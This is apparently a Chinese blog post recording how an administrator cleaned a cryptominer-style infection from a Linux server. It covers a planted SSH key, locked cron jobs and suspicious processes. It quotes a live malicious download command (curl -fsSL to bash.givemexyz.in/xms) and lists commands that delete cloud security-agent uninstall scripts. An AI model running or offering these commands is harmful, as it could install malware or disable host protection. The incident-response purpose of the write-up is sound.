linux内存占用100%
内存占用100%
使用 top 和 free 查看
# top看不到占用内存很高的进程
# free -h
[root@node01 ~]# free -h
total used free shared buff/cache available
Mem: 15Gi 13Gi 1.0Gi 99Mi 463Mi 237Mi
Swap: 0B 0B 0B
可疑公钥
[root@node01 ~]# ll -a ~/.ssh
总用量 28
drwx------ 2 root root 4096 9月 20 13:31 .
dr-xr-x--- 7 root root 4096 10月 11 09:57 ..
-rw------- 1 root root 1186 9月 20 13:31 authorized_keys
-rw------- 1 root root 399 9月 20 12:20 authorized_keys2 # 就在这
-r-------- 1 root root 1823 9月 20 13:29 id_rsa
-rw------- 1 root root 395 9月 20 13:29 id_rsa.pub
-rw-r--r-- 1 root root 2617 9月 29 21:28 known_hosts
[root@node01 ~]# cat .ssh/authorized_keys2
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver
[root@node01 ~]#
# 删除掉这玩意
[root@node01 .ssh]# rm -rf authorized_keys2
rm: 无法删除 'authorized_keys2': 不允许的操作
# 噢哟
[root@node01 .ssh]# rm -rf authorized_keys2
rm: 无法删除 'authorized_keys2': 不允许的操作
# 查看属性
[root@node01 .ssh]# lsattr authorized_keys2
-----a--------e----- authorized_keys2
# 减掉a属性
[root@node01 .ssh]# chattr -a authorized_keys2
cur attrs: 0x00080020, mask: 0x00000020
new attrs: 0x00080000
[root@node01 .ssh]# rm -rf authorized_keys2
查看进程
ps -ef # 查看可疑进程
# 发现下载进程
curl -fsSL http://bash.givemexyz.in/xms
# 下载脚本来分析
定时任务
[root@node01 .font-unix]# rm -rf /etc/cron.hourly/oanacroner1
rm: 无法删除 '/etc/cron.hourly/oanacroner1': 不允许的操作
[root@node01 .font-unix]#
[root@node01 .font-unix]# lsattr /etc/cron.hourly/oanacroner1
-----a--------e----- /etc/cron.hourly/oanacroner1
[root@node01 .font-unix]# chattr -a /etc/cron.hourly/oanacroner1
cur attrs: 0x00080020, mask: 0x00000020
new attrs: 0x00080000
[root@node01 .font-unix]#
[root@node01 .font-unix]# rm -rf /etc/cron.hourly/oanacroner1
# 删除定时任务文件
chattr -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
rm -rf /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1
rm -rf /usr/local/qcloud/stargate/admin/uninstall.sh
rm -rf /usr/local/qcloud/YunJing/uninst.sh
rm -rf /usr/local/qcloud/monitor/barad/admin/uninstall.sh
# 定时任务
/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名
/etc/crontab 这个文件负责调度各种管理和维护任务。
/etc/cron.d/ 这个目录用来存放任何要执行的crontab文件或脚本。
我们还可以把脚本放在/etc/cron.hourly、/etc/cron.daily、/etc/cron.weekly、/etc/cron.monthly目录中,让它每小时/天/星期、月执行一次。
ll /etc/cron.hourly
ll /etc/cron.daily
ll /etc/cron.weekly
ll /etc/cron.monthly
# 执行结果
[root@node01 cron.daily]# ll /etc/cron.hourly
总用量 12
-rwxr-xr-x 1 root root 575 4月 1 2020 0anacron
-rwxr-xr-x 1 root root 264 10月 11 12:08 oanacroner1 # 就这个
-rwxr-xr-x 1 root root 259 4月 24 2019 sm3-whitelist
[root@node01 cron.daily]# ll /etc/cron.daily
总用量 12
-rwxr-xr-x 1 root root 189 5月 7 2019 logrotate
-rwxr-xr-x 1 root root 618 3月 13 2020 man-db.cron
-rwxr-xr-x 1 root root 296 3月 14 2020 rpm
[root@node01 cron.daily]# ll /etc/cron.weekly
总用量 0
[root@node01 cron.daily]# ll /etc/cron.monthly
总用量 0
ll /etc/cron.hourly/oanacroner1
lsattr /etc/cron.hourly/oanacroner1
chattr -i /etc/cron.hourly/oanacroner1
chattr -a /etc/cron.hourly/oanacroner1
rm -rf /etc/cron.hourly/oanacroner1
# 这个/etc/cron.hourly/oanacroner1 文件会自动生成,可以是免密登录时,其他虚拟机传过来的
# 杀进程
kill -9 `ps -ef | grep curl | awk '{print $2}'`
kill -9 `ps -ef | grep python | awk '{print $2}'`
1
浙公网安备 33010602011771号